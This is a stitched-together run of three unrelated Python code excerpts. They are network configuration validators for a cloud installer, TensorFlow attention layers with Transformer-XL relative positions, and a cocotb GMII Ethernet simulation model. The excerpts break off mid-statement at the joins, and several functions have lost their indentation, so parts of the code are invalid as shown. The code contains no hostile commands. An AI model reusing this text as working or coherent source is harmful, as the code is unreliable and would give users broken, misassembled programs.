    min_addresses = 1 if self.is_simplex_cpe() else 3
    try:
        self.oam_network.parse_config(
            self.conf, self.config_type, OAM_TYPE,
            min_addresses=min_addresses,
            multicast_addresses=0,
            naming_type=self.naming_type)
    except ConfigFail:
        raise
    except Exception as e:
        raise ConfigFail("Error parsing configuration file: %s" % e)
def validate_aio_simplex_mgmt(self):
    """Validate the management network section for an AIO simplex system.

    On simplex only the management CIDR may be specified; any other
    management option (VLAN, address ranges, gateway, interface, ...)
    is rejected, as is an IPv6 CIDR.
    """
    # AIO simplex management network configuration
    mgmt_prefix = NETWORK_PREFIX_NAMES[self.naming_type][MGMT_TYPE]
    self.mgmt_network = Network()
    min_addresses = 16
    try:
        self.mgmt_network.parse_config(self.conf, self.config_type,
                                       MGMT_TYPE,
                                       min_addresses=min_addresses,
                                       multicast_addresses=0,
                                       naming_type=self.naming_type,
                                       logical_interface_required=False)
    except ConfigFail:
        raise
    except Exception as e:
        raise ConfigFail("Error parsing configuration file: %s" % e)
    # Anything beyond the bare CIDR is not allowed on simplex.
    if self.mgmt_network.vlan or self.mgmt_network.multicast_cidr or \
            self.mgmt_network.start_end_in_config or \
            self.mgmt_network.floating_address or \
            self.mgmt_network.address_0 or self.mgmt_network.address_1 or \
            self.mgmt_network.dynamic_allocation or \
            self.mgmt_network.gateway_address or \
            self.mgmt_network.logical_interface:
        raise ConfigFail("For AIO simplex, only the %s network CIDR can "
                         "be specified" % mgmt_prefix)
    if self.mgmt_network.cidr.version == 6:
        raise ConfigFail("IPv6 management network not supported on "
                         "simplex configuration.")
    if self.cgcs_conf is not None:
        self.cgcs_conf.add_section('cMGMT')
        self.cgcs_conf.set('cMGMT', 'MANAGEMENT_SUBNET',
                           self.mgmt_network.cidr)
def validate_aio_network(self, subcloud=False):
    """Validate the network sections for an All-In-One simplex system.

    :param subcloud: True for an AIO-SX subcloud, which (unlike a plain
        AIO-SX) is allowed to configure MGMT_NETWORK and PXEBOOT_NETWORK
    :raises ConfigFail: on any unsupported section or invalid OAM config
    """
    if not subcloud:
        # AIO-SX subcloud supports MGMT_NETWORK & PXEBOOT_NETWORK
        if self.conf.has_section('PXEBOOT_NETWORK'):
            raise ConfigFail("PXEBoot Network configuration is not "
                             "supported.")
        if self.conf.has_section('MGMT_NETWORK'):
            self.validate_aio_simplex_mgmt()
    if self.conf.has_section('INFRA_NETWORK'):
        raise ConfigFail("Infrastructure Network configuration is not "
                         "supported.")
    if self.conf.has_section('BOARD_MANAGEMENT_NETWORK'):
        raise ConfigFail("Board Management Network configuration is not "
                         "supported.")
    # validate OAM network
    oam_prefix = NETWORK_PREFIX_NAMES[self.naming_type][OAM_TYPE]
    self.validate_oam_common()
    (use_lag, external_oam_interface_name) = (
        self.process_oam_on_its_own_interface())
    # Ensure that the gateway was configured
    if self.oam_network.gateway_address is None:
        raise ConfigFail(
            "No gateway specified - %s_GATEWAY must be specified"
            % oam_prefix)
    # Check overlap with management network
    if self.mgmt_network is not None:
        try:
            self.configured_networks.append(self.mgmt_network.cidr)
            check_network_overlap(self.oam_network.cidr,
                                  self.configured_networks)
        except ValidateFail:
            # Bug fix: report the OAM CIDR (the subnet that failed the
            # overlap check and that the "%s CIDR" prefix refers to),
            # not the management CIDR.
            raise ConfigFail("%s CIDR %s overlaps with another configured "
                             "network" %
                             (oam_prefix, str(self.oam_network.cidr)))
    self.set_oam_config(use_lag, external_oam_interface_name)
def validate_version(self):
    """Check that the config file's VERSION/RELEASE matches the software.

    Offboard validation compares against the packaged TiS_VERSION token;
    on-target validation compares against the installed SW_VERSION.
    """
    if self.offboard:
        expected_version = TiS_VERSION
    else:
        from tsconfig.tsconfig import SW_VERSION
        expected_version = SW_VERSION
    if not self.conf.has_option('VERSION', 'RELEASE'):
        raise ConfigFail(
            "Version information is missing from this config file. Please"
            " refer to the installation documentation for details on "
            "the correct contents of the configuration file.")
    ini_version = self.conf.get('VERSION', 'RELEASE')
    if ini_version != expected_version:
        raise ConfigFail(
            "The configuration file given is of a different version (%s) "
            "than the installed software (%s). Please refer to the "
            "installation documentation for details on the correct "
            "contents of the configuration file and update it with "
            "any changes required for this release." %
            (ini_version, expected_version))
def validate_system(self):
    """Validate the [SYSTEM] section: timezone, type, mode and DC role.

    Populates self.system_type, self.system_mode and self.system_dc_role,
    applying defaults where options are absent, and writes the results to
    the cSYSTEM section when config generation is enabled.

    :raises ConfigFail: on any invalid or inconsistent SYSTEM option
    """
    # timezone section
    timezone = 'UTC'
    if self.conf.has_option('SYSTEM', 'TIMEZONE'):
        timezone = self.conf.get('SYSTEM', 'TIMEZONE')
    # system type section
    if self.conf.has_option("SYSTEM", "SYSTEM_TYPE"):
        self.system_type = self.conf.get("SYSTEM", "SYSTEM_TYPE")
        available_system_types = [
            SYSTEM_TYPE_STANDARD,
            SYSTEM_TYPE_AIO
        ]
        if self.system_type not in available_system_types:
            raise ConfigFail("Available options for SYSTEM_TYPE are: %s" %
                             available_system_types)
    elif not self.offboard:
        # On-target: fall back to the installed system type.
        from tsconfig.tsconfig import system_type
        self.system_type = system_type
    # system mode section
    if self.conf.has_option("SYSTEM", "SYSTEM_MODE"):
        self.system_mode = self.conf.get("SYSTEM", "SYSTEM_MODE")
        available_system_modes = [SYSTEM_MODE_DUPLEX]
        # Simplex and duplex-direct are only valid for non-standard (AIO).
        if self.system_type != SYSTEM_TYPE_STANDARD:
            available_system_modes.append(SYSTEM_MODE_SIMPLEX)
            available_system_modes.append(SYSTEM_MODE_DUPLEX_DIRECT)
        if self.system_mode not in available_system_modes:
            raise ConfigFail("Available options for SYSTEM_MODE are: %s" %
                             available_system_modes)
    else:
        # Default mode depends on system type.
        if self.system_type == SYSTEM_TYPE_STANDARD:
            self.system_mode = SYSTEM_MODE_DUPLEX
        else:
            self.system_mode = SYSTEM_MODE_DUPLEX_DIRECT
    # distributed cloud role section
    if self.conf.has_option("SYSTEM", "DISTRIBUTED_CLOUD_ROLE"):
        self.system_dc_role = \
            self.conf.get("SYSTEM", "DISTRIBUTED_CLOUD_ROLE")
        if self.config_type == SUBCLOUD_CONFIG:
            available_dc_role = [DISTRIBUTED_CLOUD_ROLE_SUBCLOUD]
        elif self.config_type != REGION_CONFIG:
            available_dc_role = [DISTRIBUTED_CLOUD_ROLE_SYSTEMCONTROLLER]
        else:
            # Bug fix: corrected "avaialbe" typo in the error message.
            raise ConfigFail("DISTRIBUTED_CLOUD_ROLE option is "
                             "not available for this configuration")
        if self.system_dc_role not in available_dc_role:
            raise ConfigFail(
                "Available options for DISTRIBUTED_CLOUD_ROLE are: %s" %
                available_dc_role)
        if (self.system_dc_role ==
                DISTRIBUTED_CLOUD_ROLE_SYSTEMCONTROLLER and
                self.system_type == SYSTEM_TYPE_AIO):
            raise ConfigFail("An All-in-one controller cannot be "
                             "configured as Distributed Cloud "
                             "System Controller")
    elif self.config_type == SUBCLOUD_CONFIG:
        # Subcloud configs imply the subcloud role even when unspecified.
        self.system_dc_role = DISTRIBUTED_CLOUD_ROLE_SUBCLOUD
    else:
        self.system_dc_role = None
    if self.cgcs_conf is not None:
        self.cgcs_conf.add_section("cSYSTEM")
        self.cgcs_conf.set("cSYSTEM", "TIMEZONE", timezone)
        self.cgcs_conf.set("cSYSTEM", "SYSTEM_MODE", self.system_mode)
        if self.system_dc_role is not None:
            self.cgcs_conf.set("cSYSTEM", "DISTRIBUTED_CLOUD_ROLE",
                               self.system_dc_role)
def validate_storage(self):
    """Reject legacy STORAGE options that are no longer configurable."""
    legacy_options = ('DATABASE_STORAGE', 'IMAGE_STORAGE', 'BACKUP_STORAGE',
                      'IMAGE_CONVERSIONS_VOLUME', 'SHARED_INSTANCE_STORAGE',
                      'CINDER_BACKEND', 'CINDER_DEVICE', 'CINDER_LVM_TYPE',
                      'CINDER_STORAGE')
    if any(self.conf.has_option('STORAGE', option)
           for option in legacy_options):
        msg = "DATABASE_STORAGE, IMAGE_STORAGE, BACKUP_STORAGE, " + \
              "IMAGE_CONVERSIONS_VOLUME, SHARED_INSTANCE_STORAGE, " + \
              "CINDER_BACKEND, CINDER_DEVICE, CINDER_LVM_TYPE, " + \
              "CINDER_STORAGE " + \
              "are not valid entries in config file."
        raise ConfigFail(msg)
def validate_pxeboot(self):
    """Validate the (optional) PXEBoot network section.

    Accepts only an IPv4 CIDR of at least /16, with an optional
    IP_START_ADDRESS/IP_END_ADDRESS range (both required together,
    start < end, at least 8 addresses). Writes the cPXEBOOT section when
    config generation is enabled; without an explicit range, the floating
    and controller addresses default to subnet addresses [2], [3] and [4].
    """
    # PXEBoot network configuration
    start_end_in_config = False
    # Region/subcloud configs use a differently named section.
    if self.config_type in [REGION_CONFIG, SUBCLOUD_CONFIG]:
        self.pxeboot_section_name = 'REGION2_PXEBOOT_NETWORK'
    else:
        self.pxeboot_section_name = 'PXEBOOT_NETWORK'
    if self.conf.has_section(self.pxeboot_section_name):
        pxeboot_cidr_str = self.conf.get(self.pxeboot_section_name,
                                         'PXEBOOT_CIDR')
        try:
            pxeboot_subnet = validate_network_str(pxeboot_cidr_str, 16)
            if pxeboot_subnet.version != 4:
                raise ValidateFail("Invalid PXEBOOT_NETWORK IP version - "
                                   "only IPv4 supported")
            self.configured_networks.append(pxeboot_subnet)
            pxeboot_start_address = None
            pxeboot_end_address = None
            if self.conf.has_option(self.pxeboot_section_name,
                                    "IP_START_ADDRESS"):
                start_addr_str = self.conf.get(self.pxeboot_section_name,
                                               "IP_START_ADDRESS")
                pxeboot_start_address = validate_address_str(
                    start_addr_str, pxeboot_subnet
                )
            if self.conf.has_option(self.pxeboot_section_name,
                                    "IP_END_ADDRESS"):
                end_addr_str = self.conf.get(self.pxeboot_section_name,
                                             "IP_END_ADDRESS")
                pxeboot_end_address = validate_address_str(
                    end_addr_str, pxeboot_subnet
                )
            if pxeboot_start_address or pxeboot_end_address:
                # Start and end must be given together and form a valid,
                # sufficiently large range.
                if not pxeboot_end_address:
                    raise ConfigFail("Missing attribute %s for %s" %
                                     ('IP_END_ADDRESS',
                                      self.pxeboot_section_name))
                if not pxeboot_start_address:
                    raise ConfigFail("Missing attribute %s for %s" %
                                     ('IP_START_ADDRESS',
                                      self.pxeboot_section_name))
                if not pxeboot_start_address < pxeboot_end_address:
                    raise ConfigFail("Start address %s not "
                                     "less than end address %s for %s."
                                     % (start_addr_str,
                                        end_addr_str,
                                        self.pxeboot_section_name))
                min_addresses = 8
                if not IPRange(start_addr_str, end_addr_str).size >= \
                        min_addresses:
                    raise ConfigFail("Address range for %s must contain "
                                     "at least %d addresses." %
                                     (self.pxeboot_section_name,
                                      min_addresses))
                start_end_in_config = True
            self.pxeboot_network_configured = True
        except ValidateFail as e:
            raise ConfigFail("Invalid PXEBOOT_CIDR value of %s for %s."
                             "\nReason: %s" %
                             (pxeboot_cidr_str,
                              self.pxeboot_section_name, e))
    if self.cgcs_conf is not None:
        self.cgcs_conf.add_section('cPXEBOOT')
        if self.pxeboot_network_configured:
            self.cgcs_conf.set('cPXEBOOT', 'PXEBOOT_SUBNET',
                               str(pxeboot_subnet))
            if start_end_in_config:
                self.cgcs_conf.set("cPXEBOOT",
                                   "PXEBOOT_START_ADDRESS",
                                   start_addr_str)
                self.cgcs_conf.set("cPXEBOOT",
                                   "PXEBOOT_END_ADDRESS",
                                   end_addr_str)
                pxeboot_floating_addr = pxeboot_start_address
                pxeboot_controller_addr_0 = pxeboot_start_address + 1
                pxeboot_controller_addr_1 = pxeboot_controller_addr_0 + 1
            else:
                # Default addresses from the start of the subnet.
                pxeboot_floating_addr = pxeboot_subnet[2]
                pxeboot_controller_addr_0 = pxeboot_subnet[3]
                pxeboot_controller_addr_1 = pxeboot_subnet[4]
            self.cgcs_conf.set('cPXEBOOT',
                               'CONTROLLER_PXEBOOT_FLOATING_ADDRESS',
                               str(pxeboot_floating_addr))
            self.cgcs_conf.set('cPXEBOOT', 'CONTROLLER_PXEBOOT_ADDRESS_0',
                               str(pxeboot_controller_addr_0))
            self.cgcs_conf.set('cPXEBOOT', 'CONTROLLER_PXEBOOT_ADDRESS_1',
                               str(pxeboot_controller_addr_1))
        self.cgcs_conf.set('cPXEBOOT', 'PXECONTROLLER_FLOATING_HOSTNAME',
                           'pxecontroller')
def validate_mgmt(self):
# Management network configuration
mgmt_prefix = NETWORK_PREFIX_NAMES[self.naming_type][MGMT_TYPE]
self.mgmt_network = Network()
if self.config_type == | |
N, H].
paddings: [B, T], or None if there is no padding.
segment_mask: [B, 1, T, S] or None. Not used right now.
per_step_padding: A mask used by decoder self-attention to prevent
information flow from future (causal padding). It has shape [B, 1, T] if
not None. Not used right now.
time_step: A scalar, the current decode step, 0-based.
use_short_seq_opt: A bool, whether using short sequence optimization. Not
supported right now.
Returns:
encoded: [B, 1, D].
updated_key_vec: [T, B, N, H].
updated_value_vec: [T, B, N, H].
Raises:
ValueError: If right_context is non-zero.
NotImplementedError: If use_short_seq_opt is true.
"""
p = self.params
if p.right_context != 0:
raise ValueError(
'Right context must be zero for autoregressive decoding.')
if use_short_seq_opt:
raise NotImplementedError('use_short_seq_opt is not supported yet.')
# Make local causal paddings, which have shape [B, T].
t, b, _, _ = py_utils.GetShape(cached_states.key, 4)
if paddings is None:
paddings = tf.zeros([b, t], dtype=query_vec.dtype)
position_diff = tf.tile(tf.range(t)[tf.newaxis, :], [b, 1]) - time_step
valid_atten = tf.math.logical_and(position_diff > -p.left_context,
position_diff <= 0)
local_causal_padding = 1.0 - tf.cast(valid_atten, dtype=query_vec.dtype)
paddings += local_causal_padding
return super().ExtendStep(theta, query_vec, cached_states, paddings,
segment_mask, per_step_padding, time_step,
use_short_seq_opt)
def zero_state(self, batch_size=1):
    """Returns the initial (all-zero) streaming state.

    Args:
      batch_size: the batch size.

    Returns:
      state: A NestedMap with zero-filled `key` and `value` tensors of
        shape [left_context, batch_size, num_heads, dim_per_head].
    """
    p = self.params
    assert p.enable_value_proj, 'Value projection must be enabled.'
    assert p.right_context == 0, ('StreamingExtendStep does not support look '
                                  'ahead')
    state_shape = [
        p.left_context, batch_size, p.num_heads, p.hidden_dim // p.num_heads
    ]
    return py_utils.NestedMap(
        key=tf.zeros(shape=state_shape, dtype=tf.float32),
        value=tf.zeros(shape=state_shape, dtype=tf.float32))
def StreamingExtendStep(self, query_vec, state, time_step):
    """Computes the value vector given the query of the current step.

    This function doesn't know the length of the full sequence, thus it is
    different from ExtendStep.

    Args:
      query_vec: A query vector of shape [B, 1, D].
      state: A `.NestedMap` object containing tensors {key, value} which are
        results of previous attentions. key, value are of shape [T, B, N, H]
        where T is the state size of this layer.
      time_step: A tensor of shape [1] and type tf.int32. Note, we can not use
        scalar tensor here because TfLiteConverter doesn't have good support of
        it (b/138865275).

    Returns:
      output: Output of the given query vector with shape [B, 1, D].
      state: updated state.
    """
    p = self.params
    assert p.enable_value_proj, 'Value projection must be enabled.'
    assert p.right_context == 0, ('StreamingExtendStep does not support look '
                                  'ahead')
    query_vec = py_utils.with_dependencies([
        py_utils.assert_shape_match(tf.shape(query_vec), [-1, 1, p.input_dim])
    ], query_vec)
    state.key = py_utils.with_dependencies([
        py_utils.assert_shape_match(
            tf.shape(state.key),
            [p.left_context, -1, p.num_heads, p.hidden_dim // p.num_heads])
    ], state.key)
    state.value = py_utils.with_dependencies([
        py_utils.assert_shape_match(
            tf.shape(state.value),
            [p.left_context, -1, p.num_heads, p.hidden_dim // p.num_heads])
    ], state.value)
    t, b, n, h = py_utils.GetShape(state.key, 4)  # t: context window size
    # Computes key, value projection and updates state.
    new_key_proj = self.key.FProp(self.theta.key, query_vec)  # [B, 1, N, H]
    new_key_proj = tf.reshape(new_key_proj, [1, b, n, h])
    # Bug fix: the value projection must come from the value projection
    # layer; the original called self.key.FProp with self.theta.value.
    new_value_proj = self.value.FProp(self.theta.value,
                                      query_vec)  # [B, 1, N, H]
    new_value_proj = tf.reshape(new_value_proj, [1, b, n, h])
    # Shift the context window left by one and append the new step.
    state.key = tf.concat([state.key[1:, :, :, :], new_key_proj], axis=0)
    state.value = tf.concat([state.value[1:, :, :, :], new_value_proj], axis=0)
    # For a time step less than the context window size, the time dimension of
    # input of logits computation is equal to the time step (not a full context
    # window).
    t = tf.math.minimum(time_step[0] + 1, t)
    key_input = state.key[-t:, :, :, :]
    value_input = state.value[-t:, :, :, :]
    # Computes query projection.
    query_proj = self.query.FProp(self.theta.query, query_vec)  # [B, 1, N, H]
    # Scales the query projection.
    if p.enable_per_dim_scale:
        query_proj = self.per_dim_scale.FProp(self.theta.per_dim_scale,
                                              query_proj)
    else:
        query_proj *= h**-0.5
    query_proj = tf.reshape(query_proj, [b, n, h])
    # Computes attention outputs.
    # TODO(wildstone): Replaces the einsum ops used below with mat mul to get
    # rid of TfLite Flex ops.
    logits = self._AttenLogitsOneStep(self.theta, query_proj, key_input,
                                      t - 1)  # [T, B, N]
    logits = tf.reshape(logits, [t, -1])
    # Softmax over the (time-major) context axis.
    posteriors = tf.nn.softmax(logits, axis=0)
    posteriors = tf.reshape(posteriors, [t, b, n])
    output = tf.einsum('TBN, TBNH->BNH', posteriors, value_input)
    # Post projection.
    output = tf.expand_dims(output, 1)
    output = self.post.FProp(self.theta.post, output)
    return output, state
@classmethod
def FPropMeta(cls, p, *args):
    """FProp cost metadata is not defined for this layer."""
    raise NotImplementedError()
class LocalSelfAttentionXL(LocalSelfAttention):
    """Local causal version of transformer-xl self attention.

    Adds Transformer-XL style relative position encoding (sinusoidal
    embeddings projected per head, plus learned u/v biases) on top of
    LocalSelfAttention. See the Transformer-XL paper, section 3.3, for the
    term_a/b/c/d decomposition referenced below.
    """

    @classmethod
    def Params(cls):
        p = super().Params()
        p.Define('rel_pos_emb_dim', None,
                 'Dimension of relative positional embedding.')
        p.Define('skip_term_b', False,
                 'If True, skip term_b in the paper section 3.3.')
        return p

    def __init__(self, params):
        """Constructs a LocalSelfAttentionXL object."""
        super().__init__(params)
        params = self.params
        if params.rel_pos_emb_dim is None or params.rel_pos_emb_dim <= 0:
            raise ValueError('Invalid rel_pos_emb_dim: %s' %
                             params.rel_pos_emb_dim)
        # Sinusoidal embedding of relative positions.
        emb_params = layers.PositionalEmbeddingLayer.Params().Set(
            embedding_dim=params.rel_pos_emb_dim)
        self.CreateChild('pos_emb', emb_params)
        # Projection layer for relative position encoding
        dim_per_head = params.hidden_dim // params.num_heads
        pos_proj_tpl = params.proj_tpl.Copy().Set(
            input_dim=params.rel_pos_emb_dim,
            num_heads=params.num_heads,
            dim_per_head=dim_per_head,
            use_bias=False)
        self.CreateChild('pos_proj', pos_proj_tpl)

    def _CreateLayerVariables(self):
        """Creates the learned u and v bias vectors of shape [N, H]."""
        super()._CreateLayerVariables()
        params = self.params
        dim_per_head = params.hidden_dim // params.num_heads
        u_pc = py_utils.WeightParams(
            shape=[params.num_heads, dim_per_head],
            init=py_utils.WeightInit.Constant(0.0),
            dtype=params.dtype,
            collections=[self.__class__.__name__ + '_vars'])
        v_pc = py_utils.WeightParams(
            shape=[params.num_heads, dim_per_head],
            init=py_utils.WeightInit.Constant(0.0),
            dtype=params.dtype,
            collections=[self.__class__.__name__ + '_vars'])
        self.CreateVariable('u', u_pc)
        self.CreateVariable('v', v_pc)

    def _AttenLogits(self, theta, query, key):
        """Computes block-local attention logits with relative positions.

        Args:
          theta: layer weights; uses theta.u, theta.v, pos_emb and pos_proj.
          query: [B, U, W, N, H] blocked queries.
          key: [B, U, C, N, H] blocked keys (C = context per block).

        Returns:
          Logits of shape [B, N, U, W, C].
        """
        b, u, w, _, _ = py_utils.GetShape(query)
        _, _, c, _, _ = py_utils.GetShape(key)
        n = self.params.num_heads
        l = self.params.left_context
        r = self.params.right_context
        f = l + r
        # term a and c
        term_ac = tf.einsum('BUTNH,BUSNH->BNUTS', query + theta.u, key)
        # term b and d
        # [1, F]
        pos = tf.expand_dims(tf.range(l - 1, -r - 1, -1), 0)
        sin_emb = self.pos_emb.FPropWithPosition(theta.pos_emb, pos)
        # [1, F, N, H]
        sin_emb = self.pos_proj.FProp(theta.pos_proj, sin_emb)
        # [F, N, H]
        sin_emb = tf.squeeze(sin_emb, 0)
        p = self.params
        if not p.skip_term_b:
            # [B, N, U, W, F]
            term_bd = tf.einsum('BUWNH,FNH->BNUWF', query + theta.v, sin_emb)
            # Perform relative shift in order to get [B, N, U, W, C]
            # Pads the input to [B, N, U, C, C+1]
            term_bd = tf.pad(term_bd,
                             ((0, 0), (0, 0), (0, 0), (0, c - w),
                              (0, c + 1 - f)))
            # Reshapes to [B, N, U, C+1, C]. Note the output last dim is
            # 1-smaller than the input, which "pushes" one element off to the
            # next row for each row. The accumulated effect is row_i is
            # right-shifted i steps (i>=0).
            term_bd = tf.reshape(term_bd, [b, n, u, c + 1, c])
            # Keeps useful slices. [B, N, U, W, C]
            term_bd = tf.slice(term_bd, [0, 0, 0, 0, 0], [-1, -1, -1, w, -1])
        else:
            # term b is skipped; only the query-independent term d remains.
            # [N, F]
            term_d = tf.einsum('NH,FNH->NF', theta.v, sin_emb)
            # [N, W, F]
            term_d = tf.tile(tf.expand_dims(term_d, 1), [1, w, 1])
            # [N, C, C+1]
            term_d = tf.pad(term_d, ((0, 0), (0, c - w), (0, c + 1 - f)))
            # [N, C+1, C]
            term_d = tf.reshape(term_d, [n, c + 1, c])
            # Keeps useful slices. [N, W, C]
            term_d = tf.slice(term_d, [0, 0, 0], [-1, w, -1])
            term_bd = tf.reshape(term_d, [1, n, 1, w, c])
        return term_ac + term_bd

    def _AttenLogitsOneStep(self, theta, query, key, time_step):
        """Attention logits for one single target (query) step.

        Args:
          theta: A `.NestedMap` object containing weights' values of this
            layer and its children layers.
          query: [B, N, H].
          key: [S, B, N, H] or [S, B, N*H/128, 128].
          time_step: Current time step.

        Returns:
          A Tensor of shape [S, B, N]
        """
        p = self.params
        s, b, _, _ = py_utils.GetShape(key, 4)
        n = p.num_heads
        h = p.hidden_dim // n
        # Transformer_XL relative attention.
        if time_step is None:
            raise ValueError('`time_step` can not be None when using relative '
                             'position encoding in attention.')
        # term a and c.
        logits = tf.einsum('BNH,SBNH->SBN', query + theta.u,
                           tf.reshape(key, [s, b, n, h]))
        # Relative distances of each cached position to the current step.
        position = tf.expand_dims(time_step - tf.range(s), 0)
        # [1, s, emb_dim]
        sin_emb = self.pos_emb.FPropWithPosition(theta.pos_emb, position)
        sin_emb = self.pos_proj.FProp(theta.pos_proj, sin_emb)
        # [s, n, h]
        sin_emb = tf.squeeze(sin_emb, 0)
        # term b and d.
        if not p.skip_term_b:
            logits += tf.einsum('BNH,SNH->SBN', query + theta.v, sin_emb)
        else:
            logits += tf.expand_dims(tf.einsum('NH,SNH->SN', theta.v, sin_emb),
                                     1)
        return logits
class RoutingAttention(MultiHeadedAttention):
""""Implements a sparse attention based on k-means clustering.
This is used in the routing transformer https://arxiv.org/pdf/2003.05997.
This verison of multi-headed attention differs from the full attention
in that it uses k-means clusterting to cluster the queries and keys | |
<gh_stars>0
"""
Copyright (c) 2020 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import logging
import struct
import zlib
import cocotb
from cocotb.queue import Queue, QueueFull
from cocotb.triggers import RisingEdge, Timer, First, Event
from cocotb.utils import get_sim_time, get_sim_steps
from .version import __version__
from .constants import EthPre, ETH_PREAMBLE
from .reset import Reset
class GmiiFrame:
    """A GMII frame: preamble+SFD plus payload (and usually FCS), with
    per-byte error flags, simulation timestamps, and an optional
    transmit-complete notification (an Event or a callable).
    """

    def __init__(self, data=None, error=None, tx_complete=None):
        self.data = bytearray()
        self.error = None           # per-byte error flags (list) or None
        self.sim_time_start = None  # sim time of the first byte
        self.sim_time_sfd = None    # sim time of the SFD byte
        self.sim_time_end = None    # sim time of the last byte
        self.tx_complete = None     # Event or callable fired after transmit

        if type(data) is GmiiFrame:
            # Copy construction: duplicate data, share metadata values.
            self.data = bytearray(data.data)
            self.error = data.error
            self.sim_time_start = data.sim_time_start
            self.sim_time_sfd = data.sim_time_sfd
            self.sim_time_end = data.sim_time_end
            self.tx_complete = data.tx_complete
        elif data is not None:
            # Bug fix: guard against data=None, which previously raised
            # TypeError from bytearray(None) despite being the default.
            self.data = bytearray(data)
            self.error = error

        if tx_complete is not None:
            self.tx_complete = tx_complete

    @classmethod
    def from_payload(cls, payload, min_len=60, tx_complete=None):
        """Build a frame from a payload: zero-pad to min_len, append FCS,
        then prepend the Ethernet preamble."""
        payload = bytearray(payload)
        if len(payload) < min_len:
            payload.extend(bytearray(min_len-len(payload)))
        payload.extend(struct.pack('<L', zlib.crc32(payload)))
        return cls.from_raw_payload(payload, tx_complete=tx_complete)

    @classmethod
    def from_raw_payload(cls, payload, tx_complete=None):
        """Build a frame by prepending the Ethernet preamble to a payload
        that already includes any padding and FCS."""
        data = bytearray(ETH_PREAMBLE)
        data.extend(payload)
        return cls(data, tx_complete=tx_complete)

    def get_preamble_len(self):
        """Length of the preamble including the SFD byte."""
        return self.data.index(EthPre.SFD)+1

    def get_preamble(self):
        """The preamble bytes including the SFD."""
        return self.data[0:self.get_preamble_len()]

    def get_payload(self, strip_fcs=True):
        """The payload after the preamble, optionally without the 4-byte FCS."""
        if strip_fcs:
            return self.data[self.get_preamble_len():-4]
        else:
            return self.data[self.get_preamble_len():]

    def get_fcs(self):
        """The trailing 4-byte frame check sequence."""
        return self.data[-4:]

    def check_fcs(self):
        """True when the trailing FCS matches the CRC32 of the payload."""
        return self.get_fcs() == struct.pack('<L', zlib.crc32(self.get_payload(strip_fcs=True)))

    def normalize(self):
        """Make self.error a list the same length as self.data: pad with the
        last flag (or all zeros when error is unset)."""
        n = len(self.data)
        if self.error is not None:
            self.error = self.error[:n] + [self.error[-1]]*(n-len(self.error))
        else:
            self.error = [0]*n

    def compact(self):
        """Drop the error list when no byte is flagged."""
        if self.error is not None and not any(self.error):
            self.error = None

    def handle_tx_complete(self):
        """Fire the transmit-complete notification, if one was registered."""
        if isinstance(self.tx_complete, Event):
            self.tx_complete.set(self)
        elif callable(self.tx_complete):
            self.tx_complete(self)

    def __eq__(self, other):
        # Bug fix: return NotImplemented (not None) for foreign types so
        # Python falls back to the reflected comparison correctly.
        if type(other) is not GmiiFrame:
            return NotImplemented
        return self.data == other.data

    def __repr__(self):
        return (
            f"{type(self).__name__}(data={self.data!r}, "
            f"error={self.error!r}, "
            f"sim_time_start={self.sim_time_start!r}, "
            f"sim_time_sfd={self.sim_time_sfd!r}, "
            f"sim_time_end={self.sim_time_end!r})"
        )

    def __len__(self):
        return len(self.data)

    def __iter__(self):
        return self.data.__iter__()

    def __bytes__(self):
        return bytes(self.data)
class GmiiSource(Reset):
def __init__(self, data, er, dv, clock, reset=None, enable=None, mii_select=None, reset_active_level=True, *args, **kwargs):
self.log = logging.getLogger(f"cocotb.{data._path}")
self.data = data
self.er = er
self.dv = dv
self.clock = clock
self.reset = reset
self.enable = enable
self.mii_select = mii_select
self.log.info("GMII source")
self.log.info("cocotbext-eth version %s", __version__)
self.log.info("Copyright (c) 2020 <NAME>")
self.log.info("https://github.com/alexforencich/cocotbext-eth")
super().__init__(*args, **kwargs)
self.active = False
self.queue = Queue()
self.dequeue_event = Event()
self.current_frame = None
self.idle_event = Event()
self.idle_event.set()
self.ifg = 12
self.mii_mode = False
self.queue_occupancy_bytes = 0
self.queue_occupancy_frames = 0
self.queue_occupancy_limit_bytes = -1
self.queue_occupancy_limit_frames = -1
self.width = 8
self.byte_width = 1
assert len(self.data) == 8
self.data.setimmediatevalue(0)
if self.er is not None:
assert len(self.er) == 1
self.er.setimmediatevalue(0)
assert len(self.dv) == 1
self.dv.setimmediatevalue(0)
self._run_cr = None
self._init_reset(reset, reset_active_level)
async def send(self, frame):
while self.full():
self.dequeue_event.clear()
await self.dequeue_event.wait()
frame = GmiiFrame(frame)
await self.queue.put(frame)
self.idle_event.clear()
self.queue_occupancy_bytes += len(frame)
self.queue_occupancy_frames += 1
def send_nowait(self, frame):
if self.full():
raise QueueFull()
frame = GmiiFrame(frame)
self.queue.put_nowait(frame)
self.idle_event.clear()
self.queue_occupancy_bytes += len(frame)
self.queue_occupancy_frames += 1
def count(self):
return self.queue.qsize()
def empty(self):
return self.queue.empty()
def full(self):
if self.queue_occupancy_limit_bytes > 0 and self.queue_occupancy_bytes > self.queue_occupancy_limit_bytes:
return True
elif self.queue_occupancy_limit_frames > 0 and self.queue_occupancy_frames > self.queue_occupancy_limit_frames:
return True
else:
return False
def idle(self):
return self.empty() and not self.active
def clear(self):
while not self.queue.empty():
frame = self.queue.get_nowait()
frame.sim_time_end = None
frame.handle_tx_complete()
self.dequeue_event.set()
self.idle_event.set()
self.queue_occupancy_bytes = 0
self.queue_occupancy_frames = 0
async def wait(self):
await self.idle_event.wait()
def _handle_reset(self, state):
if state:
self.log.info("Reset asserted")
if self._run_cr is not None:
self._run_cr.kill()
self._run_cr = None
self.active = False
